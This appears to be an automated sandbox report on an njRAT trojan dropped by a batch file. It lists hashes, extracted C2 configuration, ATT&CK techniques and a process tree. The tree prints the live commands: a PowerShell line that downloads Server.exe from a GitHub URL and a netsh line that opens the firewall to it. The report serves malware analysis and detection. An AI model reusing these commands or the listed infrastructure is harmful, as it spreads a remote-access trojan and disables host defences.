njrat | bc29f3e495e73cab8b5cc4b63d0048109fe3f33f3d209939a279053d4091448e

General

Target

DisableWDv1.bat
Size

664B
MD5

d5ae652c3c0c4ed6269743dbfb5ce953
SHA1

43a8888f001b9b7e2629746848f2a1601acb60f2
SHA256

bc29f3e495e73cab8b5cc4b63d0048109fe3f33f3d209939a279053d4091448e
SHA512

2d05a38a154adfba0b2e6d0ff38a6c3e21b6f0ec840f5618bee6b06836aef255cf98d4ad578cedf4a49955fa1cb0c4d3255c028a47fd83dcc6af1e20b62e9499

Score

10^/10

njrat hacked discovery evasion execution persistence privilege_escalation trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/pebiko70/test/main/Server.exe

Extracted

Family

njrat

Version

im523

Botnet

HacKed

C2

financial-amanda.gl.at.ply.gg:47287

Mutex

023b6c1e71ec3df384e0804152feb1fe

Attributes

reg_key
023b6c1e71ec3df384e0804152feb1fe
splitter
|'|'|

Signatures

Njrat family
njrat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	3600	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3488	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Server.exe

Executes dropped EXE 2 IoCs

pid	Process
1048	Server.exe
1708	server.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3600	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
7	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3600	powershell.exe
3600	powershell.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

description	pid	Process
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeDebugPrivilege	1708	server.exe
Token: 33	1708	server.exe
Token: SeIncBasePriorityPrivilege	1708	server.exe
Token: 33	1708	server.exe
Token: SeIncBasePriorityPrivilege	1708	server.exe
Token: 33	1708	server.exe
Token: SeIncBasePriorityPrivilege	1708	server.exe
Token: 33	1708	server.exe
Token: SeIncBasePriorityPrivilege	1708	server.exe
Token: 33	1708	server.exe
Token: SeIncBasePriorityPrivilege	1708	server.exe
Token: 33	1708	server.exe
Token: SeIncBasePriorityPrivilege	1708	server.exe
Token: 33	1708	server.exe
Token: SeIncBasePriorityPrivilege	1708	server.exe
Token: 33	1708	server.exe
Token: SeIncBasePriorityPrivilege	1708	server.exe
Token: 33	1708	server.exe
Token: SeIncBasePriorityPrivilege	1708	server.exe
Token: 33	1708	server.exe
Token: SeIncBasePriorityPrivilege	1708	server.exe
Token: 33	1708	server.exe
Token: SeIncBasePriorityPrivilege	1708	server.exe
Token: 33	1708	server.exe
Token: SeIncBasePriorityPrivilege	1708	server.exe
Token: 33	1708	server.exe
Token: SeIncBasePriorityPrivilege	1708	server.exe
Token: 33	1708	server.exe
Token: SeIncBasePriorityPrivilege	1708	server.exe
Token: 33	1708	server.exe
Token: SeIncBasePriorityPrivilege	1708	server.exe
Token: 33	1708	server.exe
Token: SeIncBasePriorityPrivilege	1708	server.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 5064 wrote to memory of 640	5064	cmd.exe	84
PID 5064 wrote to memory of 640	5064	cmd.exe	84
PID 640 wrote to memory of 2528	640	net.exe	85
PID 640 wrote to memory of 2528	640	net.exe	85
PID 5064 wrote to memory of 3600	5064	cmd.exe	86
PID 5064 wrote to memory of 3600	5064	cmd.exe	86
PID 5064 wrote to memory of 1048	5064	cmd.exe	87
PID 5064 wrote to memory of 1048	5064	cmd.exe	87
PID 5064 wrote to memory of 1048	5064	cmd.exe	87
PID 1048 wrote to memory of 1708	1048	Server.exe	89
PID 1048 wrote to memory of 1708	1048	Server.exe	89
PID 1048 wrote to memory of 1708	1048	Server.exe	89
PID 1708 wrote to memory of 3488	1708	server.exe	97
PID 1708 wrote to memory of 3488	1708	server.exe	97
PID 1708 wrote to memory of 3488	1708	server.exe	97

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DisableWDv1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5064
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:640
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pebiko70/test/main/Server.exe', 'C:\Users\Admin\AppData\Local\Temp\Server.exe')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3600
- C:\Users\Admin\AppData\Local\Temp\Server.exe
  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1048
- - C:\Users\Admin\AppData\Roaming\server.exe
    "C:\Users\Admin\AppData\Roaming\server.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1708
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:3488

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Create or Modify System Process

1

T1543

Windows Service

1

T1543.003

Event Triggered Execution

1

T1546

Netsh Helper DLL

1

T1546.007

Privilege Escalation

Create or Modify System Process

1

T1543

Windows Service

1

T1543.003

Event Triggered Execution

1

T1546

Netsh Helper DLL

1

T1546.007

Defense Evasion

Impair Defenses

1

T1562

Disable or Modify System Firewall

1

T1562.004

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\server.exe.log

Filesize
319B

MD5
da4fafeffe21b7cb3a8c170ca7911976

SHA1
50ef77e2451ab60f93f4db88325b897d215be5ad

SHA256
7341a4a13e81cbb5b7f39ec47bb45f84836b08b8d8e3ea231d2c7dad982094f7

SHA512
0bc24b69460f31a0ebc0628b99908d818ee85feb7e4b663271d9375b30cced0cd55a0bbf8edff1281a4c886ddf4476ffc989c283069cdcb1235ffcb265580fc6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Server.exe

Filesize
37KB

MD5
4e183a4e5f7aab910c7dafb866445339

SHA1
e71b14cb3a391ab84badc8df27aad7d5f2e226df

SHA256
7a196f271f282e3d8abb7fb4f72f10c77204fd183fdaa3dd6cb38fa36c42612f

SHA512
318b0ec1b8708a4247ea203a2640fa15b81a036d7a61609d1ebb4ef383bcc7f900679fdd0c37f6b08719eee8aec35f55b5cc9124981c849702ab4e015ac4c00c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kiyo1jlc.ytn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1048-20-0x0000000075232000-0x0000000075233000-memory.dmp

Filesize
4KB

Download
memory/1048-21-0x0000000075230000-0x00000000757E1000-memory.dmp

Filesize
5.7MB

Download
memory/1048-22-0x0000000075230000-0x00000000757E1000-memory.dmp

Filesize
5.7MB

Download
memory/1048-33-0x0000000075230000-0x00000000757E1000-memory.dmp

Filesize
5.7MB

Download
memory/3600-0-0x00007FFE00F33000-0x00007FFE00F35000-memory.dmp

Filesize
8KB

Download
memory/3600-6-0x00000283C32E0000-0x00000283C3302000-memory.dmp

Filesize
136KB

Download
memory/3600-11-0x00007FFE00F30000-0x00007FFE019F1000-memory.dmp

Filesize
10.8MB

Download
memory/3600-12-0x00007FFE00F30000-0x00007FFE019F1000-memory.dmp

Filesize
10.8MB

Download
memory/3600-16-0x00007FFE00F30000-0x00007FFE019F1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads